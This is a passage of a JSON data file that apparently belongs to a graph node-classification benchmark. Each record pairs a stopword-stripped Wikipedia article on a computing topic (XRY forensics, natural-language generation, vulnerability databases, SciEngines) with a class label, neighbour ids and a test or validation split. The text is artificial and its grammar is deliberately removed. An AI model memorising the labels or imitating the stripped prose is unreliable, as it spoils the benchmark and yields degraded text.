overseas release decline popularity laserdisc arcade games mid-80s expensive price laserdisc technology difficulty translate original japanese release reika voiced yuriko yamamoto since original release arcades japan 1985 time gal ported different home formats first released exclusively japan nippon victor video high density format could played microsoft msx via sony laserdisc player release sega cd console 1991 spawned numerous games took advantage cd technology introduce interactive fmvs among new titles time gal one several older laserdisc-based games ported system renovation products acquired rights publish time gal sega cd wolf team handling development released along similar games part action-reaction series first released japan november 1992 north america europe next year macintosh version also released japan 1994 american press coverage japanese release prompted video game enthusiasts contact renovations western release number requests persuaded renovation president hide irie announce release usa addition dubbed english death scenes us version censored sega cd version uses smaller color palette original includes video gallery requires passwords view level animation sequences features new opening ending theme shinji tamura motoi sakuraba respectively time gal ported playstation 1996 compilation ninja hayate another laserdisc arcade game developed taito release lacks sega cd version additional content features accurate reproduction animation compilation also released sega saturn following year game also played pioneer laseractive via sega mega-ld module laseractive version rarest home release time gal well one expensive system among collectors april 1 2017 taito classics announced would release several older games onto mobile devices time gal first release game later released japan april 5 2017 ability use game navigational function ability see game original concept art acquired in-app purchases gamepro magazine noted japanese players ate first released japanese arcades however gamesetwatch todd ciolek believed released late life laserdisc games players getting tired genre gameplay commented despite gameplay unique charming gamepro reviewer referred arcade game lost laserdisc treasure enthusiastic sega cd release called death sequences hilarious felt reduced tediousness dying mega magazine rated sega cd version number five cd game commenting though lacked difficulty good showcase system prior sega cd release electronic gaming monthly praised use cd technology felt would followed titles similar gameplay critics praised time gal visuals gamefan magazine praising wolfteam port game complimented sega cd version graphics short load times gamepro said animation great bright vivid colors fast-paced exciting movement praised funny gameplay nonstop action chris bieniek videogames computer entertainment criticized story nonsensical said unlockable video gallery nice feature effectively eliminates replay value compounds easiness game give low longevity nonetheless recommended time gal based chiefly gameplay though never really feel like 're control time gal movements zany action undeniable appeal takes lot slack shawn sackenheim allgame complimented animation calling high quality criticized sega cd graphics calling downgraded commented though time gal offered good thrill lacked replay value ciolek echoed similar statements saying enjoyable watch play commented game frustrating rigid compared contemporary standards electronic gaming monthly group reviewers praised sega cd version graphics quality three four reviewers lauded gameplay specifically challenge format reviewer stated n't care type game referring gameplay nothing memorizing author masaru takeuchi attributes origin quick time event game mechanic laserdisc games like dragon lair time gal ign levi buchanan listed fmv games like time gal one reasons behind sega cd commercial failure citing waste system capabilities ciolek referred protagonist one first human heroines industry added reika appealing lead character taito could easily turned mascot featured games media character later included alfa system shooting game castle shikigami iii —taito published arcade version japan game reika features similar attacks personality character visual design updated reika recent appearance elevator action remake elevator action deluxe one free taito dlcs",
    "neighbors": [
      9006,
      1921,
      4894,
      2743
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2437,
    "label": 4,
    "text": "XRY_(software):xry software xry digital forensics mobile device forensics product swedish company micro systemation used analyze recover information mobile devices mobile phones smartphones gps navigation tools tablet computers consists hardware device connect phones pc software extract data xry designed recover contents device forensic manner contents data relied upon user typically used civil/criminal investigations intelligence operations data compliance electronic discovery cases software available law enforcement military intelligence agencies become well known digital forensics community one common tools type work many complex challenges examining mobile phones comparison forensic examination normal computers many mobile phones proprietary operating systems makes reverse engineering devices complex operation speed mobile device market also means many new devices manufactured regular basis mobile forensics tool must deal issues suitable task xry system allows logical examinations direct communication device operating system also physical examinations bypassing operating system dumping available memory whilst logical recovery data generally better supported devices physical examination offers ability recover deleted information sms text messages images call records etc complexities topic specialist training usually recommended operate software latest versions include support recover data smartphone apps android iphone blackberry devices data recovered xry used successfully various court systems around world xry tested number different government organizations suitable needs worldwide use",
    "neighbors": [
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      11182,
      10290,
      4789,
      8635,
      830,
      2494,
      7369,
      6475,
      10189,
      4049,
      5475,
      7525,
      9319,
      2678,
      7160,
      11642
    ],
    "mask": "Test"
  },
  {
    "node_id": 2438,
    "label": 9,
    "text": "The_Art_of_the_Metaobject_Protocol:art metaobject protocol art metaobject protocol amop 1991 book gregor kiczales jim des rivieres daniel g. bobrow three working xerox parc subject metaobject protocol book contains explanation metaobject protocol desirable de facto standard metaobject protocol supported many common lisp implementations extension common lisp object system clos complete portable implementation clos metaobject protocol defined book provided xerox parc portable common loops book presents simplified clos implementation common lisp called closette sake pedagogical brevity include complex exotic clos features forward-referencing superclasses full class method redefinitions advanced user-defined method combinations complete integration clos classes common lisp type system also lacks support compilation error checking since purpose closette actual use simply demonstrate fundamental power expressive flexibility metaobject protocols application principles metacircular evaluator 1997 talk oopsla alan kay called best book anybody written ten years contended contained profound insights practical insights oop dismayed written highly lisp-centric clos-specific fashion calling hard book people read n't know lisp culture hard read",
    "neighbors": [
      4865,
      9865,
      2062,
      9877,
      4122,
      1448,
      9128,
      4779,
      5420,
      8883,
      6201,
      6969,
      7867,
      8258,
      8771,
      4550,
      11083,
      8908,
      1613,
      5585,
      9299,
      1365,
      2392,
      7896,
      6493,
      7267,
      6502,
      3176,
      2667,
      9969,
      2556,
      4606,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 2439,
    "label": 2,
    "text": "Clock_(software):clock software clock mobile app included iphone since iphone os 1 ipad since ios 6 app world clock alarms stopwatch timer tabs ios 10 bedtime tab added world clock section allows user access temperature time pressure major cities choice user add new cities tapping plus icon top screen typing name city user wants add user also remove cities swiping left clicking delete button alarms section allows user view alarms week view create new alarms turn existing alarms stopwatch section allows user ability time events see long take app also allows user pause reset use stopwatch lap feature timer section allows user set timer count specific time timer reaches zero alarm sounded ios 10 later versions bedtime feature allows user get better sleep done determining user would like wake many days alarm go many hours sleep user would like whether user would want bedtime notification feature also integrates health application track sleep data since ios 7 app icon shows user current time since ios 10 interface dark theme new stopwatch face accessed swiping left",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      6023,
      6539,
      7052,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      487,
      2023,
      7154
    ],
    "mask": "Test"
  },
  {
    "node_id": 2440,
    "label": 0,
    "text": "Natural-language_generation:natural-language generation natural-language generation nlg software process transforms structured data natural language used produce long form content organizations automate custom reports well produce custom content web mobile application also used generate short blurbs text interactive conversations chatbot might even read loud text-to-speech system automated nlg compared process humans use turn ideas writing speech psycholinguists prefer term language production process also described mathematical terms modeled computer psychological research nlg systems also compared translators artificial computer languages decompilers transpilers also produce human-readable code generated intermediate representation human languages tend considerably complex allow much ambiguity variety expression programming languages makes nlg challenging nlg may viewed opposite natural-language understanding whereas natural-language understanding system needs disambiguate input sentence produce machine representation language nlg system needs make decisions put concept words practical considerations building nlu vs. nlg systems symmetrical nlu needs deal ambiguous erroneous user input whereas ideas system wants express nlg generally known precisely nlg needs choose specific self-consistent textual representation many potential representations whereas nlu generally tries produce single normalized representation idea expressed nlg existed long time commercial nlg technology recently become widely available nlg techniques range simple template-based systems like mail merge generates form letters systems complex understanding human grammar nlg also accomplished training statistical model using machine learning typically large corpus human-written texts pollen forecast scotland system simple example simple nlg system could essentially template system takes input six numbers give predicted pollen levels different parts scotland numbers system generates short textual summary pollen levels output example using historical data july 1 2005 software produces grass pollen levels friday increased moderate high levels yesterday values around 6 7 across parts country however northern areas pollen levels moderate values 4 contrast actual forecast written human meteorologist data pollen counts expected remain high level 6 scotland even level 7 south east relief northern isles far northeast mainland scotland medium levels pollen count comparing two illustrates choices nlg systems must make discussed process generate text simple keeping list canned text copied pasted possibly linked glue text results may satisfactory simple domains horoscope machines generators personalised business letters however sophisticated nlg system needs include stages planning merging information enable generation text looks natural become repetitive typical stages natural-language generation proposed dale reiter content determination deciding information mention text instance pollen example deciding whether explicitly mention pollen level 7 south east document structuring overall organisation information convey example deciding describe areas high pollen levels first instead areas low pollen levels aggregation merging similar sentences improve readability naturalness instance merging two following sentences following single sentence lexical choice putting words concepts example deciding whether medium moderate used describing pollen level 4 referring expression generation creating referring expressions identify objects regions example deciding use northern isles far northeast mainland scotland refer certain region scotland task also includes making decisions pronouns types anaphora realization creating actual text correct according rules syntax morphology orthography example using future tense alternative approach nlg use end-to-end machine learning build system without separate stages words build nlg system training machine learning algorithm often lstm large data set input data corresponding human-written output texts end-to-end approach perhaps successful image captioning automatically generating textual caption image popular media paid attention nlg systems generate jokes see computational humor commercial perspective successful nlg applications data-to-text systems generate textual summaries databases data sets systems usually perform data analysis well text generation research shown textual summaries effective graphs visuals decision support computer-generated texts superior reader perspective human-written texts first commercial data-to-text systems produced weather forecasts weather data earliest system deployed fog used environment canada generate weather forecasts french english early 1990s success fog triggered work research commercial recent applications include uk met office text-enhanced forecast currently considerable commercial interest using nlg summarise financial business data indeed gartner said nlg become standard feature 90 modern bi analytics platforms nlg also used commercially automated journalism chatbots generating product descriptions e-commerce sites summarising medical records enhancing accessibility example describing graphs data sets blind people example interactive use nlg wysiwym framework stands see meant allows users see manipulate continuously rendered view nlg output underlying formal language document nlg input thereby editing formal language without learning content generation systems assist human writers makes writing process efficient effective content generation tool based web mining using search engines apis built tool imitates cut-and-paste writing scenario writer forms content various search results relevance verification essential filter irrelevant search results based matching parse tree query parse trees candidate answers alternative approach high-level structure human-authored text used automatically build template new topic automatically written wikipedia article several companies started since 2009 build systems transform data narrative using nlg ai techniques include narrative science phrasetech arria nlg automated insights retresco visual nlg yseop united robots scientific fields nlg researchers need test well systems modules algorithms work called evaluation three basic techniques evaluating nlg systems ultimate goal useful nlg systems helping people first techniques however task-based evaluations time-consuming expensive difficult carry especially require subjects specialised expertise doctors hence areas nlp task-based evaluations exception norm recently researchers assessing well human-ratings metrics correlate predict task-based evaluations work conducted context generation challenges shared-task events initial results suggest human ratings much better metrics regard words human ratings usually predict task-effectiveness least degree although exceptions ratings produced metrics often predict task-effectiveness well results preliminary case human ratings popular evaluation technique nlg contrast machine translation metrics widely used",
    "neighbors": [
      5122,
      5508,
      1287,
      2440,
      10634,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      2715,
      3748,
      7462,
      6695,
      7599,
      4531,
      4662,
      3127,
      2488,
      9017,
      9656,
      10557,
      6208,
      3533,
      5197,
      3663,
      6223,
      10703,
      11516,
      8538,
      10591,
      8800,
      5857,
      1890,
      10847,
      7780,
      5350,
      4072,
      8297,
      7918,
      8046,
      8688,
      8562,
      116,
      3316,
      10231,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 2441,
    "label": 2,
    "text": "Accelerator_(software):accelerator software accelerator collection development solutions ibm windows platforms using .net framework and/or lansa technologies provided surround technologies accelerator development architecture tool building windows web apps within structured framework intent accelerator solutions provide rapid application development rad environment produces well-designed n-tier code run client/server web mobile deployment use microsoft ’ .net framework recommended surround zero-lock development optimal deployment flexibility including windows presentation foundation wpf responsive web mobile design asp.net mvc bootstrap clients accelerator uses customizable templates standards naming conventions generate code generated code human readable standardized minimize testing debugging customization future maintenance efforts generated code follows object-oriented programming design principles inversion control ioc pattern observer pattern model–view–viewmodel mvvm oo techniques avoid redundancy promote ease testing maintenance supports asp.net mvc3 framework patterns followed architecture adapted depending case flexibility promoted typical use abstraction patterns practical abstraction promoted though use windows presentation foundation windows communication foundation accelerator core system architecture provides base set functionality wizard-driven code generation implementation accelerator architecture supports service-oriented architecture includes built-in features like business objects frameworks bus interfaces plug-ins xml dashboards wizards simplify deployment accelerator business objects services implements framework consists server-side business objects presentation data service buses service adapters service-oriented architecture integrates adapters xml soap rest activex .net xaml/wpf etc soa bos functions ibm windows lansa – virtually server",
    "neighbors": [
      1348,
      4042,
      4107,
      10026,
      3573,
      10486,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2442,
    "label": 9,
    "text": "Renjin:renjin renjin implementation r programming language atop java virtual machine free software released gpl renjin tightly integrated java allow embedding interpreter java application full two-way access java r code renjin development primarily supported bedatadriven ultimately made possible several current past contributors including mehmet hakan satman hannes mühleisen ruslan shevchenko renjin roots lie abortive 2010 attempt compile gnu r interpreter jvm via nestedvm toolchain involves cross-compiling c fortran code static mips binary nestedvm translate jvm bytecode proved challenging gnu r grown rely heavily dynamic linking best c standard library implementation available time mips architecture newlib fully compatible gnu c library gnu r developed experience r4jvm project provided bedatadriven team depth look gnu r codebase convinced new implementation written java feasible undertaking development renjin began october 2010 rapidly resulted functional minimal interpreter r language",
    "neighbors": [
      5833,
      5612,
      5677,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2443,
    "label": 4,
    "text": "Windows_Live_OneCare_Safety_Scanner:windows live onecare safety scanner windows live onecare safety scanner formerly windows live safety center codenamed vegas online scanning pc cleanup diagnosis service help remove viruses spyware/adware malware free web service part windows live november 18 2008 microsoft announced discontinuation windows live onecare offering users new free anti-malware suite microsoft security essentials available since second half 2009 however windows live onecare safety scanner branding windows live onecare discontinued time service officially discontinued april 15 2011 replaced microsoft safety scanner windows live onecare safety scanner offered free online scanning protection threats windows live onecare safety scanner must downloaded installed computer scan computer full service scan looks common pc health issues viruses temporary files open network ports searches removes viruses improves computer performance removes unnecessary clutter pc hard disk user choose full scan customized quick scan full scan scans viruses comprehensive scan quick scan hard disk performance disk fragmentation scan and/or desk cleanup scan network safety open port scan quick scan scans viruses specific areas computer quick scan faster full scan hence appellation service also provides virus database information online threats general computer security documentation tools virus scanner windows live onecare safety scanner site runs scan user computer site visited run periodic scans system provide features prevent viruses infecting computer time thereafter simply resolves detected infections many users posted product feedback forum report script errors relating internet explorer 7 besides ie browser supported service onecare safety scanner team actively solving problems many registry-related",
    "neighbors": [
      2309,
      1417,
      10392,
      537,
      3482,
      5799,
      5673,
      7983,
      7473,
      2046,
      5057,
      10828,
      8281,
      5082,
      7515,
      9695,
      4704,
      3935,
      4074,
      10986,
      877,
      11248,
      254
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2444,
    "label": 3,
    "text": "Young_Sherlock:_The_Legacy_of_Doyle:young sherlock legacy doyle young sherlock legacy doyle also referred young sherlock doyle isan japan-exclusive game msx developed pack-in-video released 1987 game based 1985 movie young sherlock holmes however plot completely different movie",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2445,
    "label": 2,
    "text": "Smartisan_OS:smartisan os smartisan os android-based smartphone platform developed chinese company smartisan custom rom smartphones potentially tablet devices first smartphone utilize smartisan os smartisan t1 ceo smartisan co. ltd. luo yonghao said sina weibo smartisan portmanteau smart artisan smartisan os unveiled march 27 2013 china national convention center compete miui xiaomi flyme os meizu chinese cellphone market first public beta available june 15 2013 initially compatible samsung galaxy iii plus devices followed smartisan hardware following year third-party devices supported may 2014 smartisan co. introduced first smartphone smartisan t1 year later august 26 2015 smartisan u1 announced smartisan os 2.0 taking likes oneplus 2 meizu m2 note may 2018 smartisan co. announced smartphone model r1 comes equipped smartisan os",
    "neighbors": [
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 2446,
    "label": 4,
    "text": "Vulnerability_database:vulnerability database vulnerability database platform aimed collecting maintaining disseminating information discovered computer security vulnerabilities database customarily describe identified vulnerability assess potential impact affected systems workarounds updates mitigate issue hacker surmount system information assurance three elements must apply susceptibility within system access susceptibility ability exploit susceptibility major vulnerability databases iss x-force database symantec securityfocus bid database open source vulnerability database osvdb osvdb shut april 2016 paid service vulndb took place aggregate broad range publicly disclosed vulnerabilities including common vulnerabilities exposures cve primary purpose cve run mitre attempt aggregate public vulnerabilities give standardized format unique identifier many vulnerability databases develop received intelligence cve investigate providing vulnerability risk scores impact ratings requisite workaround past cve paramount linking vulnerability databases critical patches debugs shared inhibit hackers accessing sensitive information private systems national vulnerability database nvd run national institute standards technology nist operated separately mitre-run cve database includes vulnerability information cve nvd serves enhancement data providing common vulnerability scoring system cvss risk scoring common platform enumeration cpe data open source vulnerability database provides accurate technical unbiased index vulnerability security comprehensive database cataloged 121,000 vulnerabilities spanning 113-year period osvdb founded august 2002 launched march 2004 primitive beginning newly identified vulnerabilities investigated site members explanations detailed website however necessity service thrived need dedicated staff resulted inception open security foundation osf founded non-profit organisation 2005 provide funding security projects primarily osvdb u.s. national vulnerability database comprehensive cyber security vulnerability database formed 2005 reports cve nvd primary cyber security referral tool individuals industries alike providing informative resources current vulnerabilities nvd holds excess 50,000 records publishes 13 new entries daily average similar osvdb nvd publishes impact ratings categorises material index provide users intelligible search system variety commercial companies also maintain vulnerability databases offering customers services deliver new updated vulnerability data machine-readable format well web portals examples include symantec deepsight portal vulnerability datafeed secunia purchased flexera vulnerability manager accenture vulnerability intelligence service formerly idefense vulnerability databases advise organisations develop prioritize execute patches mitigations endeavour rectify critical vulnerabilities however often lead creation additional susceptibilities patches created hastily thwart system exploitations violations depending upon level user organisation warrant appropriate access vulnerability database provides user disclosure known vulnerabilities may affect justification limiting access individuals impede hackers versed corporation system vulnerabilities could potentially exploited vulnerability databases contain vast array identified vulnerabilities however organisations possess expertise staff time revise remedy potential system susceptibilities hence vulnerability scoring method quantitatively determining severity system violation multitude scoring methods exist across vulnerability databases us-cert sans institute critical vulnerability analysis scale common vulnerability scoring system cvss prevailing technique vulnerability databases including osvdb vfeed nvd cvss based upon three primary metrics base temporal environmental provide vulnerability rating metric covers immutable properties vulnerability potential impact exposure confidential information accessibility information aftermath irretrievable deletion information temporal metrics denote mutable nature vulnerability example credibility exploitability current state system violation development workarounds could applied aspect cvss rates potential loss individuals organisations vulnerability furthermore details primary target vulnerability ranging personal systems large organisations number potentially affected individuals complication utilising different scoring systems consensus severity vulnerability thus different organisations may overlook critical system exploitations key benefit standardised scoring system like cvss published vulnerability scores assessed pursued remedied rapidly organisations individuals alike determine personal impact vulnerability system benefits derived vulnerability databases consumers organisations exponential information systems become increasingly embedded dependency reliance grows opportunity data exploitation although functionality database may appear unblemished without rigorous testing exiguous flaws allow hackers infiltrate system cyber security frequently databases published without stringent security controls hence sensitive material easily accessible database attacks recurrent form cyber security breaches recorded vulnerability databases sql nosql injections penetrate traditional information systems big data platforms respectively interpolate malicious statements allowing hackers unregulated system access established databases ordinarily fail implement crucial patches suggested vulnerability databases due excessive workload necessity exhaustive trialling ensure patches update defective system vulnerability database operators concentrate efforts major system deficiencies offers hackers unmitigated system access neglected patches databases require audit tracks record data amended accessed systems created without necessary auditing system exploitation system vulnerabilities challenging identify resolve vulnerability databases promulgate significance audit tracking deterrent cyber attacks data protection essential business personal financial information key asset purloining sensitive material discredit reputation firm implementation data protection strategies imperative guard confidential information hold view initial apathy software designers turn necessitates existence vulnerability databases systems devised greater diligence may impenetrable sql nosql injections making vulnerability databases redundant",
    "neighbors": [
      2369,
      2430,
      5636,
      8548,
      4626,
      8050,
      8563,
      2709,
      6043,
      4062,
      575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2447,
    "label": 4,
    "text": "ATATool:atatool atatool freeware software used display modify ata disk information microsoft windows environment software typically used manage host protected area hpa device configuration overlay dco features broadly similar hdparm linux recent versions include support dco restore freeze operations hpa security password operations simulated bad sectors atatool must run administrator privileges windows vista later requires elevated-privileges command prompt see user account control display detected hard disks display information hard disk 1 set hpa 10gb hard disk 1 volatile – lost next power cycle set hpa 10gb hard disk 1 non-volatile remove hpa 10gb hard disk 1 non-volatile set dco 5gb hard disk 1 remove dco hard disk 1 use atatool permanently change disk configuration may result permanent data loss making sectors disk inaccessible tool therefore used extreme care",
    "neighbors": [
      6797,
      7983,
      1873,
      823,
      4408,
      537,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2448,
    "label": 2,
    "text": "Listaller:listaller listaller free computer software installation system similar package management system aimed making simple create package installed linux distributions well providing tools api make software management linux user-friendly listaller started december 2007 freedesktop.org developer matthias klumpp experimental project explore possibility writing universal user interface manage kinds linux software matter installed therefore listaller backends manage autopackage loki mojo native distribution packages original project provided one user interface manage kinds installed software interaction native distribution package management done via abstraction layer later replaced packagekit listaller also provided cross-distribution software installation format made easier create packages run multiple distributions installer part listaller also able assist installing autopackage packages first versions written object pascal although project started experiment soon evolved competitor autopackage mojo 2011 listaller never made stable release announcement appstream lot original listaller goals would achieved author decided change listaller away full software manager software installer joined forces appstream project pascal considered ideal language collaborate projects project already spent much time developing pascal bindings third-party libraries listaller rewritten vala subset original features main goal provide seamless integration appstream packagekit therefore universal software manager part removed project focuses creating cross-distro format distribution binary linux software nov 10 2014 matthias announced limba project limba supposed listaller next version listaller intended used installing binary pre-compiled versions non-core applications word processors web browsers personal computer games rather core libraries applications operating system shells listaller intended provide support installing system libraries security reasons listaller using package format so-called ipk packages short installation package lzma-compressed signed tarballs ipk packages contain small configuration files modify setup process provide logic scripts run install time parts setup process handled listaller built-in routines make possible distributors modify setup process 3rd-party applications comply policy necessary key value listaller integration desktop environments existing package management tools distributions therefore project provides several integration components default make possible manage listaller-installed 3rd-party applications software manager supports packagekit and/or appstream time discussed run installed 3rd-party tools sandbox default programs use listaller must also relocatable meaning must installable varying directories single binary makes possible listaller install software non-root users home directory although method enabled explicitly use encouraged listaller developer tools provide tools documentation application developers make software relocatable august 2010 projects announced merge consequence merge autopackage abandoned package binary package format user interfaces install autopackage packages autopackage tools like binreloc create relocatable applications apbuild developed part listaller project reason merging autopackage listaller mainly great lack developers projects decided join forces kde provides support listaller apper although distributors need explicitly enable using compile-time switch support gnome currently developed part gnome-packagekit suite theory distribution run packagekit 0.8.6 able provide listaller support ubuntu announced use listaller 3rd-party installer ubuntu phone develop ubuntu-specific solution instead",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      1813,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      10172,
      3649,
      10817,
      9671,
      5067,
      6227,
      4951,
      2010,
      9564,
      7140,
      5096,
      4972,
      9324,
      7920,
      6257,
      1138,
      1522,
      2804,
      10096,
      6393,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2449,
    "label": 2,
    "text": "Nokia_E50:nokia e50 nokia e50 business device bar-style monoblock quad-band smartphone nokia announced 18 may 2006 part eseries intended primarily corporate business market includes sophisticated e-mail support nokia ’ intellisync wireless email blackberry connect visto mobile activesync mail exchange altexia well imap4 also ability view microsoft word powerpoint excel attachments pdf documents used editing without additional apps application manager downloads removes installs nokia third-party applications device device synchronization possible data transfer application features include edge bluetooth 2.0 1,280 × 960 pixels 1.3-megapixel camera microsd memory-card slot digital music video player functionality realplayer flash player unit support umts wi-fi fm radio uses third edition series 60 user-interface s60v3 symbian operating system version 9.1 binary compatible software compiled earlier versions symbian operating system check firmware v 07.36.0.0",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      4365,
      9359,
      1424,
      529,
      10770,
      8083,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      2208,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      9964,
      109,
      5998,
      1776,
      8433,
      5875,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 2450,
    "label": 4,
    "text": "SciEngines_GmbH:sciengines gmbh sciengines gmbh privately owned company founded 2007 spin-off copacobana project universities bochum kiel germany project intended create platform affordable custom hardware attack copacobana massively-parallel reconfigurable computer utilized perform so-called brute force attack recover des encrypted data consists 120 commercially available reconfigurable integrated circuits fpgas xilinx spartan3-1000 run parallel create massively parallel system since 2007 sciengines gmbh enhanced developed successors copacobana furthermore copacobana become well known reference platform cryptanalysis custom hardware based attacks symmetric asymmetric cyphers stream ciphers 2008 attacks a5/1 stream cipher encryption system used encrypt voice streams gsm published first known real world attack utilizing off-the-shelf custom hardware introduced 2008 rivyera s3-5000 enhancing performance computer dramatically via using 128 spartan-3 5000 currently sciengines rivyera holds record brute-force breaking des utilizing 128 spartan-3 5000 fpgas current systems provide unique density 256 spartan-6 fpgas per single system enabling scientific utilization beyond field cryptanalysis like bioinformatics providing standard off-the-shelf intel cpu mainboard integrated fpga computer rivyera systems allow execute standard code without modifications sciengines aims programmers focus porting time consuming 5 code fpga therefore bundle eclipse like development environment allows code implementation hardware based implementation languages e.g vhdl verilog well c based languages application programming interface c c++ java fortran allow scientists programmers adopt code benefit application-specific hardware architecture",
    "neighbors": [
      4036,
      5677,
      3762,
      11125,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2451,
    "label": 4,
    "text": "Nuix:nuix nuix pty ltd australian technology company produces software platform indexing searching analyzing extracting knowledge unstructured data applications include digital investigation cybersecurity e-discovery information governance email migration privacy january 2017 software platform reportedly used least 1800 customers 65 countries company headquarters sydney australia offices conshohocken herndon san francisco new york united states cork ireland london united kingdom nuix founded 2000 goal make vast quantities unstructured data easily searchable 2006 company grew two developers 400 employees 2010 nuix awarded five-year contract securities exchange commission 2014 company appointed industry partner international multilateral partnership cyber threats 2017 nuix board directors appointed rod vawdrey position chief executive officer nuix markets ediscovery digital investigation security intelligence information governance solutions based nuix engine nuix engine combines load balancing fault tolerance processing technologies provide insights large volumes unstructured semi-structured structured data several features nuix engine granted patent 2011 november 2016 nuix announced new analysis platform called nuix insight analytics intelligence endpoint security product nuix insight adaptive security integrates cybersecurity threat prevention detection response remediation deception nuix donated software licences training international consortium investigative journalists icij used nuix investigate offshore leaks data süddeutsche zeitung icij also used analyze panama papers using nuix software panama papers investigation team made 2.6 terabytes scanned documents text-searchable extracted metadata helped journalists cross-reference people places business entities across documents october 2015 nuix reported raised 250,000 room read philanthropic product proof finder nuix largest shareholder macquarie group shareholding approximately 70",
    "neighbors": [
      2818,
      10867,
      11476
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2452,
    "label": 3,
    "text": "Advanced_Computing_Environment:advanced computing environment advanced computing environment ace defined industry consortium early 1990s next generation commodity computing platform successor personal computers based intel 32-bit instruction set architecture effort found little support market dissolved due lack sales infighting within group consortium announced 9th april 1991 compaq microsoft mips computer systems digital equipment corporation santa cruz operation time widely believed risc-based systems would maintain price/performance advantage ad hoc wintel systems however also widely believed windows nt would quickly displace many operating systems combined effects wide selection software ease building wintel machines supported ace formed provide alternative platform wintel providing viable alternative advantages terms software support greater advantages terms performance environment standardized mips architecture two operating systems sco unix open desktop would become windows nt originally named os/2 3.0 advanced risc computing arc document produced give hardware firmware specifications platform members consortium included acer control data corporation kubota nec corporation nkk olivetti prime computer pyramid technology siemens silicon graphics sony sumitomo tandem computers wang laboratories zenith data systems besides large companies several start-up companies built ace-compliant systems well companies involved reasons joining ace effort initiative used microprocessor companies attempt take market share away intel system companies used initiative attempt take market share away workstation leader sun microsystems soon initiative announced dissenting faction seven ace members declared decision support little-endian architectures short-sighted subgroup known apache group promoted big-endian alternative group whose name conceived pun big indian unrelated later apache software foundation later adopted name mips/open rift within ace consortium averted decided add support big-endian svr4 even ace initiative consortium began fall apart little year started became apparent mass market alternative wintel computing platform upstart platforms offer enough performance improvement incumbent pc major cost disadvantages systems due low volume production initiative started risc based systems running 100-200 mhz time substantial performance advantage intel 80486 original pentium chips running approximately 60 mhz time intel quickly migrated pentium design newer semiconductor process generations performance operating frequency advantage slipped away compaq first company leave consortium stating departure ceo rod canion one primary backers behind formation ace shifting priorities away higher-end systems followed short order sco announcing suspending work moving version unix mips platform potential conflicts earlier year mips purchased sgi may also contributed concerns neutrality target platform dec released alpha processor less interested promoting competing architecture finally significant improvements intel x86 performance made abandoning less attractive although ace supported x86 time intel never member main product ace group advanced risc computing specification arc initially based mips-based computer hardware firmware environment although ace went defunct computer ever manufactured fully complied arc standard arc system still exerts widespread legacy microsoft windows nt-based operating systems windows xp used arc conventions naming boot devices windows vista sgi used modified version arc firmware calls arcs systems sgi computers run irix 6.1 later indy octane etc boot arcs console uses drive naming conventions windows accordingly addition various risc-based computers designed run windows nt used versions arc boot console boot nt among computers also predicted intel ia-32-based computers would adopt arc console although sgi ever marketed ia-32-based machines arc firmware namely sgi visual workstation series went sale 1999 products complying degree arc standard include",
    "neighbors": [
      4228,
      5380,
      9742,
      7311,
      8976,
      2071,
      408,
      9723,
      6942,
      426,
      7215,
      7983,
      11058,
      7093,
      2811,
      9665,
      7234,
      10051,
      1606,
      3142,
      6854,
      5076,
      6879,
      3945,
      3818,
      6252,
      5873,
      499,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 2453,
    "label": 1,
